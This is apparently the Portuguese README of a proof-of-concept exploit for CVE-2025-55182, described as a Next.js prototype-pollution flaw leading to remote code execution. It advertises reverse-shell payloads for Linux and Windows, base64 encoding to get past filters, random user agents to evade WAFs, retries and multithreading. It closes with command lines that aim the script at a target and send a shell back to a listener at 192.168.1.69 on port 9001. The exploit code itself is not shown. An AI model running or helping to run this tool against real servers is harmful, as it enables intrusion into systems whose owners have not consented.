
Poc for CVE-2025-55182
CVE-2025-55182 é uma vulnerabilidade crítica de poluição de protótipo no nextjs que permite RCE através de sanitização inadequada de entrada no mecanismo de manipulação de requisições do framework. Tudo isso acontece porque o nextjs confia em objetos JSON como um novato inexperiente.
1) Poluição de Protótipo no Parsing de Requisições: o nextjs sanitiza incorretamente objetos que podem poluir a cadeia de protótipos.
2) Desserialização Insegura: o framework permite que objetos JSON modifiquem protótipos de objeto base.
3) RCE via child_process: ao poluir a cadeia de protótipos, uma vez poluída, podemos sequestrar a lógica e fazer o servidor executar comandos.
npm create [email protected] vuln
1) Payloads de Reverse Shell: shells reversos Linux/Win
2) Codificação Base64 para burlar filtros
3) Detecção automática de SO
4) User agents aleatórios para evitar WAFs
5) Loops de repetição em caso de falha para tentativas com backoff exponencial
6) Multithreading para tentativas de exploração concorrentes para confiabilidade
python exp_v2.py target 192.168.1.69 9001 --base64
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3
python exploit.py target.com 192.168.1.69 9001 --no-spoof